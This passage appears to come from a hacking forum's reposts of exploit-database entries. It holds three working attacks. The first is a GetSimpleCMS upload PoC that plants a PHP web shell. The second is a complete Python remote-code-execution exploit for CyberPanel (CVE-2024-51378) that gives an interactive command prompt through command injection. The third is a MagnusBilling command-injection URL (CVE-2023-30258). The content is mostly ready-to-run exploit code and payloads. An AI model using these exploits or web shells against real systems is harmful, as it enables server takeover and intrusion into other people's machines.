"<Malicious File>" }, PoC-2: 1) LLM creates the file exploit.phar with the following contents: malicious.php 0000644 0000000 0000000 00000000036 00000000000 010442 0 ustar 00 <?php system($_GET['cmd']); ?> 2) 1. Prepare a PHP file named 'exploit.phar' .\n 2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n 3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id). [Replace Your Domain Name]
  24. HireHackking

    CyberPanel 2.3.6 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE) # Date: 10/29/2024 # Exploit Author: Luka Petrovic (refr4g) # Vendor Homepage: https://cyberpanel.net/ # Software Link: https://github.com/usmannasir/cyberpanel # Version: 2.3.5, 2.3.6, 2.3.7 (before patch) # Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch) # CVE: CVE-2024-51378 # PoC Repository: https://github.com/refr4g/CVE-2024-51378 # Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/ #!/usr/bin/python3 import argparse import httpx import sys RED = "\033[91m" GREEN = "\033[92m" CYAN = "\033[96m" MAGENTA = "\033[95m" YELLOW = "\033[93m" RESET = "\033[0m" print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit") print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}") print() allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"] parser = argparse.ArgumentParser() parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}") parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}") args = parser.parse_args() if args.endpoint not in allowed_endpoints: print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}") parser.print_help() sys.exit(1) target = args.target endpoint = args.endpoint client = httpx.Client(base_url=target, verify=False) try: response = client.get("/") response.raise_for_status() except httpx.RequestError: print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}") sys.exit(1) def get_token(): response = client.get("/") return response.cookies.get("csrftoken") def rce(client, csrf_token, cmd, endpoint): headers = { "X-CSRFToken": csrf_token, "Content-Type": "application/json", "Referer": str(client.base_url) } payload = '{"statusfile": "; %s; #"}' % cmd response = client.request("OPTIONS", endpoint, headers=headers, data=payload) return response.json().get("requestStatus") csrf_token = get_token() if not csrf_token: print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}") sys.exit(1) while True: cmd = input(f"{YELLOW}$> {RESET}") print(rce(client, csrf_token, cmd, endpoint))
  25. HireHackking

    MagnusSolution magnusbilling 7.3.0 - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/magnussolution/magnusbilling7 # Software Link: https://github.com/magnussolution/magnusbilling7 # Version: 7.3.0 # Tested on: Centos # CVE : CVE-2023-30258 # PoC URL for Command Injection http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt Result: This PoC attempts to inject the id command. [Replace Your Domain Name]